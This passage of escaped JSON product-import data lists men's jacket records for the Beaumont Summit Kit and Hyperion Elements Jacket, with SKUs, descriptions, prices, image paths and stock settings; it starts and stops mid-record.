Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-L-Yellow\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"220\":{\"sku\":\"MJ01-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-XL-Orange\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"221\":{\"sku\":\"MJ01-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-XL-Red\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"222\":{\"sku\":\"MJ01-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit-XL-Yellow\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"beaumont-summit-kit-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"223\":{\"sku\":\"MJ01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Beaumont Summit Kit\",\"description\":\"<p>The smooth nylon shell around the Beaumont Summit Kit combats wind, reinforced with a cold-fighting brushed fleece layer. The jacket is reversible, giving you a new look for the return trek. Ample pocket space rounds out this hiker\'s paradise package.<\\/p>\\n<p>&bull; Yellow full zip rain jacket.<br \\/>&bull; Full-zip front. <br \\/>&bull; Stand-up collar. <br \\/>&bull; Elasticized cuffs. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Lightweight|Hooded|Rain Coat|Hard Shell|Windbreaker|&frac14; zip|Reversible,material=Fleece|LumaTech&trade;|Polyester,pattern=Solid,climate=Cool|Rainy|Spring|Windy,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ01-XS-Orange,size=XS,color=Orange|sku=MJ01-XS-Red,size=XS,color=Red|sku=MJ01-XS-Yellow,size=XS,color=Yellow|sku=MJ01-S-Orange,size=S,color=Orange|sku=MJ01-S-Red,size=S,color=Red|sku=MJ01-S-Yellow,size=S,color=Yellow|sku=MJ01-M-Orange,size=M,color=Orange|sku=MJ01-M-Red,size=M,color=Red|sku=MJ01-M-Yellow,size=M,color=Yellow|sku=MJ01-L-Orange,size=L,color=Orange|sku=MJ01-L-Red,size=L,color=Red|sku=MJ01-L-Yellow,size=L,color=Yellow|sku=MJ01-XL-Orange,size=XL,color=Orange|sku=MJ01-XL-Red,size=XL,color=Red|sku=MJ01-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj01-yellow_alt1.jpg,\\/m\\/j\\/mj01-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Lightweight|Hooded|Rain Coat|Hard Shell|Windbreaker|&frac14; zip|Reversible\",\"material\":\"Fleece|LumaTech&trade;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cool|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"224\":{\"sku\":\"MJ02-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-XS-Green\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"225\":{\"sku\":\"MJ02-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-XS-Orange\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"226\":{\"sku\":\"MJ02-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-XS-Red\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"227\":{\"sku\":\"MJ02-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-S-Green\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 